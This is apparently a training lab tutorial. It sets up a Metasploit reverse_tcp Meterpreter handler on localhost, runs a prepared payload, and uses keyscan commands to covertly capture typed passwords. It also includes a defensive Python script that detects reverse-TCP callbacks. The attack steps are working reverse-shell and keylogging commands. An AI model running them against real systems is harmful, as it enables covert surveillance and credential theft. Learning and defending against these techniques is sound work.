Introduction
In this lab, you will explore a common post-exploitation technique: keystroke logging. Keystroke logging, or "keylogging," is the process of recording the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. In penetration testing, this technique is invaluable for gathering sensitive information such as usernames, passwords, and other confidential data.
We will use Metasploit Framework's powerful payload, Meterpreter, to accomplish this. Meterpreter has a built-in module called keyscan that allows an attacker to easily start, dump, and stop a keylogger on a compromised system. Throughout this lab, you will learn how to gain a Meterpreter session, deploy the keylogger, capture keystrokes, and then clean up your tracks.
Gain a Meterpreter session on a target
In this step, we will set up a listener in Metasploit and execute a payload to gain a Meterpreter session. For the purpose of this lab, we will act as both the attacker and the target on the same machine. A payload file named payload.elf has already been created for you in the ~/project directory.
First, let's start the Metasploit Framework console.
msfconsole -q
Once msfconsole is loaded, we need to set up a handler to listen for the incoming connection from our payload.
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
Now, run the listener as a background job using the -j flag.
exploit -j
You should see that the handler has started.
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444
Now, open a new terminal tab by clicking the + icon in the terminal panel. In this new tab, execute the payload.
./payload.elf
Switch back to your first terminal tab with msfconsole. You should see a message indicating that a Meterpreter session has been opened.
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38908) at 2023-10-27 10:30:00 -0400
To interact with this new session, use the sessions command.
sessions -i 1
Your prompt should change to meterpreter>, indicating you are now in control of the target session.
[*] Starting interaction with 1...
meterpreter >
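From the defender's side, the session line the handler prints above (a second process holding an established TCP connection to the handler's port) is exactly the artifact a host-level check can catch. The following Python script is an added example, not part of the original lab or of Metasploit: it parses the output of `ss -tnp` (a constructed sample is embedded so it runs offline; the regex assumes ss's `users:(("name",pid=N,fd=N))` process column) and flags established connections whose peer port is a known handler default or whose owning process is not on a small allowlist. The port set and the allowlist are assumptions for illustration and would be tuned per host.

```python
import re

# Constructed sample of `ss -tnp` output (not captured from the lab machine).
# Line 1: the payload connected back to the handler on 127.0.0.1:4444.
# Line 2: the handler (msfconsole runs under ruby) side of the same connection.
# Line 3: a benign browser connection for contrast.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port Process
ESTAB  0      0      127.0.0.1:38908      127.0.0.1:4444    users:(("payload.elf",pid=4242,fd=3))
ESTAB  0      0      127.0.0.1:4444       127.0.0.1:38908   users:(("ruby",pid=4100,fd=12))
ESTAB  0      0      10.0.2.15:51234      203.0.113.10:443  users:(("firefox",pid=2001,fd=55))
"""

# Assumed tuning values: 4444 is the lab's LPORT and a common handler default;
# the allowlist stands in for whatever normally owns outbound sockets on the host.
SUSPECT_PORTS = {4444}
EXPECTED_CLIENTS = {"firefox", "curl", "ssh", "apt", "ruby"}

# One `ss -tnp` connection line: state, queues, local addr:port, peer addr:port, process.
SS_LINE = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+'
    r'(?P<laddr>\S+):(?P<lport>\d+)\s+'
    r'(?P<raddr>\S+):(?P<rport>\d+)\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+),fd=\d+\)\)'
)


def parse_ss(text):
    """Yield one dict per parseable connection line; the header and anything else is skipped."""
    for line in text.splitlines():
        m = SS_LINE.match(line.strip())
        if m:
            conn = m.groupdict()
            for key in ("lport", "rport", "pid"):
                conn[key] = int(conn[key])
            yield conn


def find_reverse_connections(text):
    """Return findings for established connections that look like a reverse-TCP callback."""
    findings = []
    for conn in parse_ss(text):
        if conn["state"] != "ESTAB":
            continue
        reasons = []
        if conn["rport"] in SUSPECT_PORTS:
            reasons.append(f"peer port {conn['rport']} is a known handler default")
        if conn["proc"] not in EXPECTED_CLIENTS:
            reasons.append(f"unexpected process {conn['proc']!r} owns an outbound socket")
        if reasons:
            findings.append({
                "proc": conn["proc"],
                "pid": conn["pid"],
                "peer": f"{conn['raddr']}:{conn['rport']}",
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    # On a live host you would feed in subprocess.run(["ss", "-tnp"], ...).stdout instead.
    for f in find_reverse_connections(SAMPLE_SS_OUTPUT):
        print(f"{f['proc']} (pid {f['pid']}) -> {f['peer']}: " + "; ".join(f["reasons"]))
```

Only the payload process is reported: its peer port is the handler default and `payload.elf` is not an expected network client, while the handler's own socket (peer port 38908, owned by ruby) and the browser connection pass both checks. In practice this kind of check is run periodically or folded into an EDR rule, and the allowlist is the part that needs the most care.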
Start the keystroke logger with the keyscan_start command
In this step, with an active Meterpreter session, we will start the keystroke logger on the target machine. The command for this is keyscan_start. This command injects a keylogger into a process on the target system and begins capturing all keyboard input.
Ensure you are at the meterpreter> prompt. Type the following command and press Enter:
keyscan_start
The system will confirm that the keylogger has been initiated.
Starting the keystroke sniffer...
The logger is now running silently in the background on the target system, recording every key that is pressed.
Wait for the user to type information
In this step, we will simulate a user typing sensitive information on the target machine. Since our keylogger is active, it will capture this activity.
Open a new terminal tab again by clicking the + icon. In this new terminal, we will simulate a user typing a password. You can type any command, but for this example, we'll use echo to simulate typing a secret password.
echo "MySuperSecretPassword123"
After running the command, you can close this new terminal tab. The keystrokes for echo "MySuperSecretPassword123" have now been captured by our running keylogger. Return to the terminal tab where your Meterpreter session is active.
Dump the captured keystrokes with the keyscan_dump command
In this step, we will retrieve the keystrokes that have been captured by the logger. The keyscan_dump command fetches all the recorded keystrokes from the target machine and displays them in your Meterpreter console.
At the meterpreter> prompt, execute the following command:
keyscan_dump
You will see the output of all the keystrokes captured since the logger was started. This will include the command you typed in the previous step.
Dumping captured keystrokes...
echo "MySuperSecretPassword123"
As you can see, the command we typed in the other terminal has been successfully captured. This demonstrates how an attacker can steal credentials, commands, and other sensitive text typed by a user.
Stop the keystroke logger with keyscan_stop
In this step, we will stop the keylogger. It is crucial for a penetration tester to clean up after an engagement to remove any artifacts and stop any running processes, leaving the target system as it was found.
To stop the keylogger, use the keyscan_stop command in your Meterpreter session.
keyscan_stop
The system will confirm that the keylogger has been stopped.
Stopping the keystroke sniffer...
The keylogger is no longer active on the target machine. You can now safely exit the Meterpreter session and msfconsole by typing exit twice.
Summary
In this lab, you have successfully learned how to perform keystroke logging on a target system using Meterpreter. You practiced the entire lifecycle of this post-exploitation technique, from gaining a session to cleaning up your tools.
You learned how to:
- Establish a Meterpreter session using a handler and a payload.
- Start the keylogger on a target using the keyscan_start command.
- Dump the captured keystrokes to view sensitive information with keyscan_dump.
- Stop the keylogger and clean up the session using keyscan_stop.
This is a powerful technique that highlights the importance of system security and monitoring. Remember to use these skills responsibly and ethically. Congratulations on completing the lab!